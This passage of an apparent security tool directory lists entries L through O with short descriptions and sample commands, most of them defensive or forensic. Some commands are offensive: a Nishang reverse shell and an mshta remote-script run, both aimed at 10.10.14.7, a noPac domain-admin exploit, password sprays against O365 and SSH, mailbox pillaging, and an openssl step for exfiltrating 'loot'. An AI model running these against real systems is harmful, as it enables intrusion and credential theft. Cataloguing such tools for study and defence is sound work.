ls -la ~/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons 2>/dev/null
added by THUGS(red)

List extended attributes possibly hiding data one-liner Linux

Forensics Steganography

Extended attributes are an easy-to-overlook place to smuggle a small payload or marker outside a file normal content stream.

find / -xdev -exec getfattr -d {} \; 2>/dev/null | grep -B1 '^user\.'
added by THUGS(red)

List inbound firewall allow rules one-liner Windows

Blue Team Enumeration

A quick sweep for a custom allow-rule that could be an attacker tunnel, or an admin forgotten backdoor port.

netsh advfirewall firewall show rule name=all dir=in | findstr /i "Rule Enabled Action LocalPort"
added by THUGS(red)

List installed configuration profiles one-liner macOS

Blue Team Enumeration

A malicious or unexpected MDM configuration profile can silently redirect DNS, install a root CA, or restrict settings; this lists everything currently installed.

profiles list -verbose
added by THUGS(red)

List installed Safari extensions one-liner macOS

Enumeration Forensics

A rogue Safari extension is a common, low-friction way to persist browser-based data theft; this enumerates what is installed without opening Safari.

ls -la ~/Library/Safari/AppExtensions ~/Library/Containers/com.apple.Safari/Data/Library/Safari/AppExtensions 2>/dev/null
added by THUGS(red)

List installed software from the registry one-liner Windows

Enumeration

Faster and quieter than Get-WmiObject Win32_Product, which triggers an MSI repair scan on every single call.

Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher
added by THUGS(red)

List Keychain item metadata one-liner macOS

Enumeration Forensics

Lists Keychain item service and account names, not the secrets themselves without further prompts, a fast way to see what credentials an account has stored.

security dump-keychain -d login.keychain | grep -A1 "0x00000007"
added by THUGS(red)

List Kubernetes pods running as root or privileged one-liner

Blue Team Cloud Defensive

Quick cluster-wide audit for containers that do not need to run privileged or as root but do anyway — a top item on any container hardening review.

kubectl get pods --all-namespaces -o json | jq -r '.items[] | select(.spec.containers[].securityContext.privileged==true or .spec.securityContext.runAsUser==0) | "\(.metadata.namespace)/\(.metadata.name)"'
added by THUGS(red)

List listening sockets and owning process one-liner Linux

Enumeration Network

Shows every listening TCP/UDP socket together with the PID that owns it, the fastest way to see what a box is actually exposing.

ss -tulpn
added by THUGS(red)

List loaded kernel extensions one-liner macOS

Enumeration Forensics

Third-party kexts are rare on modern macOS since most vendors moved to system extensions, which makes any unfamiliar one worth investigating immediately.

kextstat | grep -v com.apple
added by THUGS(red)

List local administrators one-liner Windows

Enumeration

Confirms exactly who lands in the high-value bucket before spending time on a privesc chain that was not even necessary.

Get-LocalGroupMember -Group "Administrators"
added by THUGS(red)

List local user accounts via directory services one-liner macOS

Enumeration

dscl reads the same account database System Settings does, without needing the GUI, useful for spotting a hidden or newly created account.

dscl . list /Users | grep -v '^_'
added by THUGS(red)

List open files and network sockets one-liner macOS

Enumeration Network

lsof is available on macOS just as on Linux, and remains the most direct way to tie a listening or connected socket back to its process.

lsof -i -P | grep -i listen
added by THUGS(red)

List processes with no on-disk backing image one-liner

Blue Team Forensics Malware

A process running from memory with a deleted or missing on-disk image is a strong process-injection/hollowing indicator — this osquery pulls exactly that condition.

osqueryi "SELECT pid, name, path, cmdline FROM processes WHERE on_disk = 0;"
added by THUGS(red)

List processes with their owning account one-liner Windows

Enumeration

Ties every running process back to the account it runs as, useful for spotting a SYSTEM service worth targeting or a session already compromised.

Get-WmiObject Win32_Process | Select-Object Name, ProcessId, @{n='Owner';e={$_.GetOwner().User}}
added by THUGS(red)

List recently created scheduled tasks (persistence check) one-liner Windows

Blue Team Defensive Forensics

Scheduled tasks are one of the most common Windows persistence mechanisms; this lists every task with its creation/last-run time so a recently added one stands out.

Get-ScheduledTask | Get-ScheduledTaskInfo |
  Sort-Object LastRunTime -Descending |
  Select-Object TaskName, LastRunTime, NextRunTime
added by THUGS(red)

List recently modified files under a web root one-liner Linux

Blue Team Forensics

Webshells and dropped files usually touch a file's mtime; this narrows a whole web root down to what changed in the suspected compromise window.

find /var/www -type f -mmin -1440 -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort
added by THUGS(red)

List scheduled tasks with their run-as account one-liner Windows

Enumeration Red Team

A task run by SYSTEM that points at a user-writable script or binary is a common, realistic local privesc; this dumps every task run-as and command.

schtasks /query /fo LIST /v | findstr /i "TaskName Run As User Task To Run"
added by THUGS(red)

List the full process table with arguments one-liner Linux

Enumeration

A password passed on the command line, visible only with the ww flag, is a recurring and embarrassingly simple credential leak.

ps auxww
added by THUGS(red)

List unquoted service paths one-liner Windows

CTF Enumeration Red Team

Finds services whose executable path contains a space and no quotes — a classic Windows privilege-escalation vector if you can drop a file into one of the ambiguous path segments.

Get-WmiObject win32_service | Where {$_.PathName -notlike 'C:\Windows*' -and $_.PathName -notlike '"*'} | Select Name,PathName
added by THUGS(red)

List volume shadow copies one-liner Windows

Enumeration Forensics Red Team

A shadow copy can still hold an old SAM, SYSTEM or NTDS.dit, letting credentials be extracted without touching the live locked file.

vssadmin list shadows
added by THUGS(red)

List Windows services running as SYSTEM with a writable binary path one-liner Windows

Blue Team Defensive Forensics

A service binary path an unprivileged user can overwrite is a classic privilege-escalation and persistence weakness; this narrows the whole service list down to that condition.

Get-WmiObject win32_service | Where-Object { $_.StartName -eq 'LocalSystem' } |
  Select-Object Name, DisplayName, PathName, StartMode
added by THUGS(red)

LittleSis tool

OSINT Research

Crowd-sourced database mapping relationships between powerful people, companies and organisations — board seats, donations, family ties.

visit → added by THUGS(red)

Live-tail auth.log for brute-force attempts one-liner Linux

Blue Team Network

Watches SSH failed-password attempts as they happen — the manual, no-Fail2ban-installed version of noticing a brute-force in progress.

tail -f /var/log/auth.log | grep --line-buffered 'Failed password'
added by THUGS(red)

Locksmith tool Windows

Blue Team Defensive Enumeration

PowerShell module that scans Active Directory Certificate Services (AD CS) for the common ESC1-ESC8-style misconfigurations, and can remediate several of them automatically.

Invoke-Locksmith -Mode 2
visit → added by THUGS(red)

LOG-MD tool Windows

Blue Team Defensive Forensics

Free triage tool that pulls and highlights the Windows Event Log entries and registry/config items that matter most for malicious activity detection and log hardening review.

visit → added by THUGS(red)

Loki tool

Blue Team Defensive Malware

Florian Roth's free IOC and YARA scanner — walks a filesystem checking file hashes, filenames, YARA signatures and known-bad registry/process indicators against a curated ruleset, for a quick compromise check on a single host.

python loki.py -p C:\
visit → added by THUGS(red)

LOLBAS tool Windows

Cheat Sheets LOLBAS / LOTL Red Team

The Windows counterpart to GTFOBins — signed, native Windows binaries and scripts that can be repurposed to download, execute or exfiltrate without dropping extra tooling on disk.

visit → added by THUGS(red)

LOLBAS Project tool Windows

LOLBAS / LOTL Red Team Research

Reference database of Windows binaries, scripts and libraries that can be repurposed for living-off-the-land attack techniques — the site itself, not any single one-liner in it.

visit → added by THUGS(red)

LOLDrivers tool Windows

Cheat Sheets LOLBAS / LOTL Malware

Catalogue of known vulnerable and malicious signed Windows kernel drivers (the "bring your own vulnerable driver" list) used for EDR-killing and kernel-level attacks.

visit → added by THUGS(red)

LOOBins tool macOS

Red Team Research

macOS equivalent of GTFOBins/LOLBAS — documents native macOS binaries that can be abused for living-off-the-land offensive techniques.

visit → added by THUGS(red)

Look up a matching libc from leaked addresses one-liner Linux

Binary / RE CTF

Queries the public libc.rip / libc-database mirror with one or more leaked symbol addresses to identify the exact libc build a remote pwn target is running.

curl -s https://libc.rip/api/find -H 'Content-Type: application/json' -d '{"symbols":{"printf":"0x7f..."}}'
added by THUGS(red)

macro_pack tool Windows

Payloads Red Team

Automates generating obfuscated Office macros, VBS, HTA and other MS Office payloads for phishing-based initial access simulations.

macro_pack.exe -t GENERATE -G payload.doc -o -f script.vba
visit → added by THUGS(red)

Magnet AXIOM tool Windows

Blue Team Forensics Mobile

Commercial DFIR platform from Magnet Forensics — unifies computer, mobile and cloud artifact recovery with a single timeline/case view, common in corporate and LE forensics labs.

visit → added by THUGS(red)

Magnet RAM Capture tool Windows

Blue Team Forensics

Free Windows RAM acquisition tool from Magnet Forensics — simple GUI, outputs a raw memory image suitable for Volatility or Magnet AXIOM.

visit → added by THUGS(red)

Maigret tool

OSINT Recon

Username OSINT tool that collects a person's accounts across thousands of sites and can generate an HTML/PDF report, going further than a simple existence check by pulling profile data.

maigret target_username --html
visit → added by THUGS(red)

MailSniper tool Windows

Brute Force Offensive Red Team

Searches Exchange/Office 365 mailboxes for sensitive strings (passwords, "VPN", etc) and can password-spray OWA/EWS — post-compromise mailbox pillaging in one PowerShell module.

Invoke-SelfSearch -Mailbox [email protected] -Terms "password"
visit → added by THUGS(red)

Malcat tool Windows

Binary / RE Blue Team Malware

Hex-editor-meets-static-analyzer built for malware and CTF work — combines hex view, disassembly, string extraction, entropy visualisation and YARA scanning in one IDE-like window.

visit → added by THUGS(red)

Malcolm tool Linux

Blue Team Forensics Network

CISA's network traffic analysis toolset — packages Zeek, Suricata and Arkime with an OpenSearch/Kibana front end into one Docker-composed stack, for a full-fidelity network monitoring deployment without building it component by component.

visit → added by THUGS(red)

MalDuck tool

Blue Team Malware

CERT.pl's Python library for malware config extraction and crypto/decoding primitives — the extraction engine behind mwdb/Karton pipelines for many malware families.

visit → added by THUGS(red)

Maltego tool

OSINT Recon

A graphical link-analysis platform for OSINT — runs "transforms" against an entity (domain, email, person) and draws the results as an explorable graph rather than a flat list.

visit → added by THUGS(red)

MalwareBazaar tool

Malware Research

abuse.ch project sharing malware samples and hashes submitted by the community, with free API access for hash lookups and bulk sample downloads for research.

visit → added by THUGS(red)

Manalyze tool

Binary / RE Blue Team Malware

Static PE analysis tool aimed at malware triage — plugin architecture scores suspicious imports, packing, resources and sections and can run YARA rules over the binary.

manalyze --dump=all suspicious.exe
visit → added by THUGS(red)

Manjusaka tool

Offensive Payloads Red Team

Rust/Go C2 framework with a web management panel, generating implants for Windows and Linux; documented as active in real intrusions as well as red team use.

visit → added by THUGS(red)

Manticore tool Linux

Binary / RE CTF Research

Trail of Bits' symbolic execution tool for exploring a binary's (or EVM contract's) execution paths and generating concrete inputs that reach a chosen state.

manticore ./chall
visit → added by THUGS(red)

Map listening ports to owning process one-liner Windows

Enumeration Network

The Windows equivalent of ss -tulpn, pairs every listening socket with a PID for quick triage of what a box is actually exposing.

netstat -ano | findstr LISTENING
added by THUGS(red)

Mapillary tool

OSINT Recon

Crowd-sourced street-level imagery platform, used in geolocation OSINT to visually corroborate a building, sign or landmark against a claimed location.

visit → added by THUGS(red)

Masscan tool Linux

Network Recon

An asynchronous, internet-scale port scanner capable of scanning the entire IPv4 address space in under six minutes — trades nmap's depth for raw speed, then hands results to nmap for the detail pass.

masscan -p1-65535 10.10.10.0/24 --rate 10000
visit → added by THUGS(red)

MassDNS tool Linux

DNS Enumeration Network

A high-performance bulk DNS resolver — designed to resolve millions of domain names against a list of resolvers in a fraction of the time a per-query tool would take, the workhorse underneath most large-scale DNS enumeration tooling.

massdns -r resolvers.txt -t A -o S -w results.txt domains.txt
visit → added by THUGS(red)

Medusa tool Linux

Brute Force

Fast, modular, parallel network login brute-forcer supporting a wide range of services (SSH, FTP, SMB, MySQL, RDP, VNC, etc), the classic alternative to Hydra.

medusa -h 10.10.10.5 -u admin -P rockyou.txt -M ssh
visit → added by THUGS(red)

MemProcFS tool

Blue Team Forensics

Mounts a memory dump (or a live target over PCILeech/DMA) as a virtual filesystem — processes, modules, handles and the registry become browsable files and directories instead of Volatility plugin output.

mount -f memory.dmp
visit → added by THUGS(red)

Mentalist tool

Brute Force Wordlists

GUI wordlist generator that lets you build mangling rule chains (leetspeak, appended years, case toggling) visually and export them for Hashcat/John.

visit → added by THUGS(red)

Merlin tool

Offensive Payloads Red Team

Cross-platform Go-based C2 that leans on HTTP/2, HTTP/3 and QUIC transports to blend into modern web traffic.

go run cmd/merlinserver/main.go -i
visit → added by THUGS(red)

Metadata2Go tool

Forensics OSINT

Browser-based metadata viewer for images, office documents, audio and video — a quick no-install alternative when ExifTool isn't available on the box you're using.

visit → added by THUGS(red)

Metagoofil tool

Forensics OSINT Recon

Extracts metadata (author names, software versions, paths) from public documents discovered via search engines for a target domain.

metagoofil -d example.com -t pdf,doc,xls -l 50 -n 20 -o results -f results.html
visit → added by THUGS(red)

Metasploit Framework tool

Offensive Payloads Red Team

The world's most widely used penetration-testing framework — thousands of exploit and auxiliary modules, a scriptable console, and Meterpreter as its post-exploitation payload.

msfconsole -q -x "use exploit/multi/handler; run"
visit → added by THUGS(red)

MFTECmd tool Windows

Blue Team Forensics

Eric Zimmerman's $MFT parser — turns the NTFS Master File Table into CSV, revealing file creation/modification timestamps and deleted entries for timeline building.

MFTECmd.exe -f \$MFT --csv out
visit → added by THUGS(red)

Miasm tool

Binary / RE Research

Python reverse-engineering framework covering disassembly, lifting to an intermediate representation, emulation and symbolic execution across several architectures.

visit → added by THUGS(red)

Microburst tool

Blue Team Cloud Enumeration

NetSPI's PowerShell toolkit for Azure security assessment — enumerates storage accounts, key vaults, automation accounts and other Azure resources for exposed secrets and misconfigurations.

visit → added by THUGS(red)

Microsoft Sentinel tool

Blue Team Cloud Defensive

Cloud-native SIEM/SOAR on Azure — Kusto (KQL) analytics rules, hunting queries and playbooks over log data collected from Azure, on-prem and other clouds.

SecurityEvent | where EventID == 4625 | summarize count() by Account, IpAddress | order by count_ desc
visit → added by THUGS(red)

Million Short tool

OSINT Recon Search Engines

Search engine that lets you strip out the top N most popular results, surfacing the obscure long tail a normal search buries — handy in dorking when the top results are all noise.

visit → added by THUGS(red)

MISP tool

Blue Team Defensive Malware

Open-source threat intelligence platform — stores, correlates and shares IOCs and events between organisations via a structured, taxonomy-tagged data model.

visit → added by THUGS(red)

mitm6 tool Linux

MITM Network Red Team

Abuses IPv6's default-on status on most Windows networks: answers DHCPv6 requests nobody expected to get answered, then relays the resulting traffic — a very reliable AD compromise path where IPv6 is unmanaged.

sudo mitm6 -d domain.local
visit → added by THUGS(red)

MITRE ATT&CK tool

Blue Team Red Team Research

The ATT&CK knowledge base itself — tactics, techniques and real intrusion examples per adversary group — distinct from the interactive Navigator tool built on top of it.

visit → added by THUGS(red)

MITRE ATT&CK Navigator tool

Blue Team Red Team Research

Interactive matrix tool for exploring, annotating and layering the ATT&CK framework — used to map detections/coverage or plan a red-team engagement against real adversary techniques.

visit → added by THUGS(red)

MITRE Caldera tool

Blue Team Defensive Red Team

MITRE's automated adversary emulation platform — runs chained ATT&CK techniques against a target environment on a schedule, so a blue team can verify their detections actually fire rather than assuming they would.

visit → added by THUGS(red)

MITRE D3FEND tool

Blue Team Research

MITRE's knowledge graph of defensive countermeasures, mapped against ATT&CK offensive techniques — the "other side" of ATT&CK for planning detections and mitigations.

visit → added by THUGS(red)

Mobexler tool Windows

Mobile

Preconfigured Windows VM for mobile app pentesting — bundles Genymotion, Burp, Frida, MobSF and the rest of the usual Android/iOS testing stack so it does not need assembling by hand.

visit → added by THUGS(red)

MobSF (Mobile Security Framework) tool

Mobile

An automated, all-in-one mobile application (Android/iOS/Windows) pentesting framework — static and dynamic analysis with a web dashboard, built to run as a self-hosted service.

visit → added by THUGS(red)

Momentum Firmware tool

Hardware NFC / RFID Wireless / WiFi

Community custom firmware for Flipper Zero focused on stability and quality-of-life features on top of the official stack (more protocols, UI tweaks, plugin support).

visit → added by THUGS(red)

Moneta tool Windows

Blue Team Malware

A memory-anomaly scanner for detecting malware implants that leave no trace on disk — walks a process's virtual memory looking for the permission/backing-file inconsistencies that in-memory injection techniques produce.

Moneta64.exe -p 1234
visit → added by THUGS(red)

Mordor tool

Blue Team Defensive Research

Pre-recorded, ATT&CK-mapped security event datasets (from Roberto Rodriguez's OTR project) for practising detection engineering and hunting without needing your own attack lab.

visit → added by THUGS(red)

MP3Stego tool

CTF Steganography

Hides data inside an MP3 file during the compression process itself, rather than after encoding — a common source for CTF "hidden data in this audio file" challenges.

visit → added by THUGS(red)

msbuild — compile and run an inline task from a project file one-liner Windows

LOLBAS / LOTL Red Team

MSBuild will compile and execute inline tasks embedded in a .csproj file — a signed .NET build tool doubling as a code-execution engine.

MSBuild.exe project.csproj
visit → added by THUGS(red)

mshta — run a remote HTA file one-liner Windows

LOLBAS / LOTL Red Team

mshta.exe runs HTML Applications, including script pulled from a URL — a signed Microsoft binary that happily executes remote script.

mshta.exe http://10.10.14.7:8000/file.hta
visit → added by THUGS(red)

msieve tool

Cryptography CTF

Fast implementation of the quadratic sieve and number field sieve for integer factorization, one of the tools yafu calls out to for larger moduli.

./msieve -f n
visit → added by THUGS(red)

MSOLSpray tool

Brute Force Cloud Red Team

Password sprays Microsoft Online (Azure AD/O365) accounts and, from the login response, distinguishes valid credentials from lockouts, MFA prompts and disabled accounts.

python3 msolspray.py --userlist users.txt --password Summer2026!
visit → added by THUGS(red)

Mullvad VPN tool

VPN / Anonymity

Privacy-focused commercial VPN that accepts cash/crypto and assigns an account number instead of requiring an email or identity, with an audited no-logs policy and a scriptable CLI.

mullvad connect
visit → added by THUGS(red)

multimon-ng tool Linux

Research SDR / RF

Decodes classic digital paging/data-over-radio protocols (POCSAG, FLEX, AFSK, DTMF and more) from an audio stream, usually piped straight from rtl_fm.

rtl_fm -f 152.0M | multimon-ng -a POCSAG512 -t raw -
visit → added by THUGS(red)

mwdb-core tool

Blue Team Malware

CERT.pl's Malware Database — a sample repository and analysis pipeline hub that stores samples, configs and relations, feeding automated processing via Karton.

visit → added by THUGS(red)

MXToolbox tool

DNS Network

Suite of DNS and mail diagnostic lookups — MX records, DNSBL blacklist status, SPF/DKIM/DMARC validation — in one dashboard.

visit → added by THUGS(red)

Mythic tool

Offensive Red Team

A collaborative, plugin-based command-and-control framework — rather than shipping one implant, Mythic hosts multiple community-built agents (Apollo, Poseidon, Medusa…) behind one operator UI.

visit → added by THUGS(red)

naabu tool

Network Recon Red Team

A fast SYN/CONNECT port scanner from ProjectDiscovery, built to slot into a recon pipeline (subfinder -> naabu -> httpx -> nuclei) rather than run standalone.

naabu -host target.tld -top-ports 1000
visit → added by THUGS(red)

Name-That-Hash tool

CTF Hashing

Identifies the likely algorithm(s) behind a hash string and can hand off straight into Hashcat/John — a modern, actively maintained replacement for hashID/hash-identifier.

nth -t <hash>
visit → added by THUGS(red)

Namechk tool

OSINT Recon

Web service that checks username and domain availability across a large set of social networks and platforms simultaneously.

visit → added by THUGS(red)

Ncat tool

Network

The Nmap Project's modern reimplementation of netcat — TCP/UDP swiss-army-knife with SSL, proxying and connection brokering that classic netcat never had.

ncat -lvnp 4444
visit → added by THUGS(red)

Ncrack tool

Brute Force

High-speed network authentication cracker from the Nmap project, built for large-scale login testing (RDP, SSH, VNC, WinRM, etc) with timing profiles similar to Nmap's.

ncrack -p rdp --user admin -P rockyou.txt 10.10.10.5
visit → added by THUGS(red)

NDSS Symposium Proceedings tool

Network Research

Freely available proceedings of the Network and Distributed System Security Symposium, another top-tier venue alongside USENIX Security, IEEE S&P and CCS.

visit → added by THUGS(red)

Nebula tool

Network VPN / Anonymity

Slack's open-source mesh overlay networking tool combining certificate-based identity with WireGuard-style tunnels — an alternative to Tailscale/ZeroTier for building your own private mesh.

nebula -config config.yml
visit → added by THUGS(red)

Needle tool macOS

Mobile Red Team

Modular iOS security testing framework (the closest thing iOS has to Drozer) — storage, binary analysis, network and runtime manipulation modules for a jailbroken test device.

python3 needle.py
visit → added by THUGS(red)

Nessus tool

Blue Team Network Whitebox

A widely deployed commercial vulnerability scanner (a free "Essentials" tier exists) — CVE-backed checks across a huge range of software and network devices, with policy-based scanning and reporting.

visit → added by THUGS(red)

Netcat tool

CTF Network

The original "TCP/IP swiss army knife" — reads and writes across network connections from the command line, and the tool almost every reverse shell one-liner assumes is on the box.

nc -lvnp 4444
visit → added by THUGS(red)

Netcraft Site Report tool

DNS Recon Research

A domain's hosting history in one report — IP history, hosting provider changes, detected technology and a risk rating, often used to attribute infrastructure moves.

visit → added by THUGS(red)

Netdisco tool

Blue Team Enumeration Network

Open-source network management and discovery tool — maps switches, routers and connected devices via SNMP/CDP/LLDP for network asset inventory and port-tracing.

visit → added by THUGS(red)

Netdiscover tool Linux

Enumeration Network

An active/passive ARP reconnaissance tool for discovering hosts on a local network without relying on DHCP — useful on networks with no DHCP server or where a full port scan would be noisier than necessary.

netdiscover -r 192.168.1.0/24
visit → added by THUGS(red)

NetExec tool

Brute Force Enumeration Red Team

Actively-maintained fork/successor of CrackMapExec — swiss-army-knife for AD network protocols: authentication spraying, command execution, hash dumping and share enumeration over SMB/WinRM/LDAP/MSSQL/RDP/SSH.

nxc smb 10.10.10.0/24 -u users.txt -p pass --shares
visit → added by THUGS(red)

NetExec (formerly CrackMapExec) tool

Enumeration Network Offensive Red Team

The successor to CrackMapExec — a swiss-army-knife for testing large Active Directory networks: credential spraying, command execution, share enumeration, all across a whole subnet at once.

nxc smb 10.10.10.0/24 -u user -p pass --shares
visit → added by THUGS(red)

Netlas.io tool

Device Search OSINT Recon Search Engines

Internet-scanning search engine covering hosts, domains, certificates and WHOIS, positioned as a cheaper alternative to Shodan/Censys with a similar dork syntax.

visit → added by THUGS(red)

netsniff-ng tool Linux

Blue Team Network

High-performance Linux network toolkit — zero-copy packet sniffer/analyzer/replay tool built around the kernel ring-buffer for capturing at line rate on busy links.

netsniff-ng --in eth0 --out capture.pcap
visit → added by THUGS(red)

NetworkMiner tool Windows

Blue Team Forensics Network

A passive network forensics tool that reconstructs sessions, files, credentials and host details straight out of a PCAP — built for pulling artifacts out of captured traffic rather than live monitoring.

visit → added by THUGS(red)

Netzob tool

Blue Team Network Research

Protocol reverse-engineering tool — infers the message format and state machine of an unknown or undocumented protocol from captured traffic samples.

visit → added by THUGS(red)

NexFil tool

OSINT Recon

Fast asynchronous username-existence checker that verifies a handle across a large curated site list, positioned as a quicker alternative to sequential checkers.

nexfil -u target_username
visit → added by THUGS(red)

nfdump / NfSen tool Linux

Blue Team Network

NetFlow/IPFIX collection and analysis toolset — nfdump captures and filters flow records from the CLI, NfSen adds a web front-end with graphs and alerting on top.

nfdump -R /flows -o long 'src ip 10.0.0.5'
visit → added by THUGS(red)

ngrep tool Linux

Blue Team Network

grep for network traffic — matches a regex against packet payloads live off an interface or a pcap file, handy for quickly spotting a known string in a stream of packets.

ngrep -q -d eth0 'password' tcp port 80
visit → added by THUGS(red)

Nikto tool

Network Web

An open-source web server scanner that checks for thousands of dangerous files/programs, outdated server software and other misconfigurations — fast and deliberately noisy.

nikto -h https://target.tld
visit → added by THUGS(red)

Nishang tool Windows

Payloads Red Team

Long-running collection of offensive PowerShell scripts covering reverse/bind shells, keylogging, privesc checks and post-exploitation, widely used to seed C2 payload development.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4444
visit → added by THUGS(red)

nmap tool

CTF Network Recon Red Team

Network Mapper — port scanning, service/version detection and scriptable auditing (NSE) for discovery and security assessment.

nmap -sC -sV -T4 -oA initial <ip or host>
visit → added by THUGS(red)

noPac tool Linux

Offensive Red Team

Chains the sAMAccountName spoofing (CVE-2021-42278) and CVE-2021-42287 KDC bugs into a one-shot domain-admin-from-domain-user exploit against unpatched Active Directory.

python3 noPac.py corp.local/user:pass -dc-ip 10.10.10.5 -shell
visit → added by THUGS(red)

Noriben tool Windows

Blue Team Malware

A Python wrapper around Sysinternals Procmon that auto-generates a concise, readable malware behaviour report — file, registry, network and process activity — from one run.

python Noriben.py
visit → added by THUGS(red)

nRF Connect for Mobile tool

Enumeration Mobile Wireless / WiFi

Nordic Semiconductor's free Android/iOS app for scanning BLE advertisements and browsing/writing GATT services and characteristics by hand — the everyday tool for poking at a smart-device's Bluetooth surface.

visit → added by THUGS(red)

ntopng tool

Blue Team Network

Real-time network traffic monitoring with a web dashboard — flow-level visibility, host and application breakdowns, and historical trending, positioned as a modern, browser-based successor to the original ntop.

ntopng -i eth0
visit → added by THUGS(red)

Nuclei tool

Recon Red Team Web

ProjectDiscovery's fast, template-driven vulnerability scanner — thousands of community-maintained YAML templates cover CVEs, misconfigurations and exposed panels across a target list in one pass.

nuclei -u https://target.tld -t cves/ -severity critical,high
visit → added by THUGS(red)

NVD (National Vulnerability Database) tool

Research

NIST's official vulnerability database — the canonical source for CVE records, CVSS scores and CPE data, with a full public API.

visit → added by THUGS(red)

O.MG Cable tool

Hardware Payloads Red Team

A USB charge/data cable with a hidden implant for keystroke injection and Wi-Fi-controlled payload delivery, built to look and function like an ordinary cable.

visit → added by THUGS(red)

o365spray tool

Brute Force Cloud Enumeration

Username enumeration and password spraying against Office 365/Azure AD, supporting several login endpoints so it keeps working when Microsoft tweaks one response format.

python3 o365spray.py --validate -d corp.com
visit → added by THUGS(red)

objection tool

CTF Mobile

Runtime mobile exploration toolkit built on Frida that works without a jailbreak/root — bypass SSL pinning, dump the keychain/keystore, patch an app, all interactively.

objection -g com.target.app explore
visit → added by THUGS(red)

OCCRP Aleph tool

OSINT Research Search Engines

Cross-border investigative search engine over leaked documents, corporate registries and sanctions data, built by the Organized Crime and Corruption Reporting Project.

visit → added by THUGS(red)

one_gadget tool

Binary / RE CTF Payloads

Finds single-address "one gadget RCE" offsets inside a given libc that pop a shell if a small set of register/memory constraints happen to hold — a pwn-exploit shortcut.

one_gadget ./libc.so.6
visit → added by THUGS(red)

OnionSearch tool

OSINT Search Engines

Scrapes multiple dark-web search engines at once for a search term and consolidates the .onion results into one list.

onionsearch --search "keyword" --output results.txt
visit → added by THUGS(red)

ONYPHE tool

Device Search OSINT Recon Search Engines

Cyber defense search engine that collects internet-wide scan, passive DNS and threat data and exposes it via a query language and API for attack-surface discovery.

visit → added by THUGS(red)

OPA / Gatekeeper tool

Blue Team Cloud Defensive

Open Policy Agent and its Kubernetes admission-controller integration, Gatekeeper — write once, enforce policy-as-code rules that reject non-compliant resources before they are ever created.

opa eval -i input.json -d policy.rego "data.k8s.deny"
visit → added by THUGS(red)

OpenCanary tool Linux

Blue Team Defensive Network

Thinkst's lightweight, low-interaction honeypot daemon — fakes a handful of common services (SSH, RDP, SMB, HTTP, a fake MySQL) just convincingly enough to alert the moment anything touches them, with almost no operational overhead.

opencanaryd --start
visit → added by THUGS(red)

OpenCorporates tool

OSINT Research

The largest open database of company registration records worldwide, aggregating official company-registry data from dozens of jurisdictions.

visit → added by THUGS(red)

OpenCTI tool

Blue Team Defensive Research

An open-source threat intelligence platform structured around the STIX2 data model — links indicators, malware, threat actors and campaigns as a knowledge graph rather than a flat feed of IOCs.

visit → added by THUGS(red)

OpenCVE tool

Research

Free CVE tracking and alerting platform — subscribe to specific vendors/products and get notified of new or updated CVEs affecting them.

visit → added by THUGS(red)

OpenOCD tool

Hardware

On-chip debugger supporting a huge range of JTAG/SWD adapters and target MCUs — halts, single-steps and dumps memory on embedded targets, the usual next step once JTAG pins are found.

openocd -f interface/stlink.cfg -f target/stm32f4x.cfg
visit → added by THUGS(red)

OpenSanctions tool

OSINT Research

Consolidated, searchable database of global sanctions lists, politically exposed persons and watchlists, free for non-commercial use.

visit → added by THUGS(red)

openssl — quick file encryption without extra tooling one-liner Linux

Cryptography CTF

openssl is on almost every box already; this is the fastest way to symmetrically encrypt/decrypt a file for exfiltration without pulling in gpg.

openssl enc -aes-256-cbc -salt -in loot.tar -out loot.tar.enc -k <passphrase>
# decrypt: openssl enc -d -aes-256-cbc -in loot.tar.enc -out loot.tar -k <passphrase>
added by THUGS(red)

OpenStego tool

Steganography

Open-source steganography tool for hiding data inside images and for invisible-watermark embedding, with both a GUI and a CLI.

visit → added by THUGS(red)

OpenVAS / Greenbone Vulnerability Management tool Linux

Blue Team Network Whitebox

A full-featured open-source vulnerability scanning and management framework that grew out of the last open Nessus release — a free, self-hosted alternative for network-wide vulnerability assessment.

visit → added by THUGS(red)

OpenVPN tool

Network VPN / Anonymity

Long-standing SSL/TLS-based VPN daemon and protocol — still the default self-hosted option on countless routers/appliances even as WireGuard-based tools take over new deployments.

openvpn --config client.ovpn
visit → added by THUGS(red)

OpenWebRX tool Linux

Hardware SDR / RF

Web-based SDR receiver server — points a browser at a shared radio front end so a receiver can be listened to and demodulated remotely without installing client software.

visit → added by THUGS(red)

osascript — run a one-line AppleScript from the shell one-liner macOS

Mobile Red Team

osascript is the built-in bridge from a shell into AppleScript — the fastest way to script a GUI interaction (or a user-facing prompt) without writing a .scpt file.

osascript -e 'display dialog "test"'
added by THUGS(red)

OSINT Framework tool

Cheat Sheets OSINT Recon

Not a tool but a curated, clickable index of OSINT tools and resources organised by category — the map most people start from before they know which specific tool they need.

visit → added by THUGS(red)

OSINT Techniques tool

Cheat Sheets OSINT Recon

Michael Bazzell's long-running OSINT resource site, companion to the "OSINT Techniques" book, with categorised tool links and methodology notes kept current as sites change.

visit → added by THUGS(red)

Osintgram tool

OSINT Recon

OSINT tool for gathering information (followers, tagged photos, comments, likely-related accounts) from a public Instagram profile.

osintgram target_username
visit → added by THUGS(red)

Osmedeus tool Linux

Enumeration Recon Red Team

Automated reconnaissance framework that chains subdomain enumeration, port scanning, screenshotting and vulnerability scanning into one workflow for large-scope bug-bounty recon.

osmedeus scan -t example.com
visit → added by THUGS(red)

OsmocomBB tool Linux

Hardware Research SDR / RF

Open-source GSM baseband firmware and host tools for a handful of old Motorola phones, letting researchers run and inspect the actual GSM protocol stack instead of only sniffing the air interface.

visit → added by THUGS(red)

osquery tool

Blue Team Defensive Enumeration

Facebook/Meta's endpoint agent that exposes an operating system's state (processes, users, open sockets, installed packages, scheduled tasks) as SQL tables — 'ask the OS a question' via SQL instead of a bespoke agent API.

osqueryi "SELECT pid, name, path FROM processes WHERE on_disk = 0;"
visit → added by THUGS(red)

OSSEC tool

Blue Team Defensive

The original open-source host intrusion detection system that Wazuh forked from — log analysis, file integrity monitoring, rootkit detection and active response from a lightweight multi-platform agent.

visit → added by THUGS(red)

OSSEM tool

Blue Team Defensive

Open Source Security Events Metadata project — a common data model and documentation for standardising log field meaning across platforms, so detections translate cleanly between tools.

visit → added by THUGS(red)

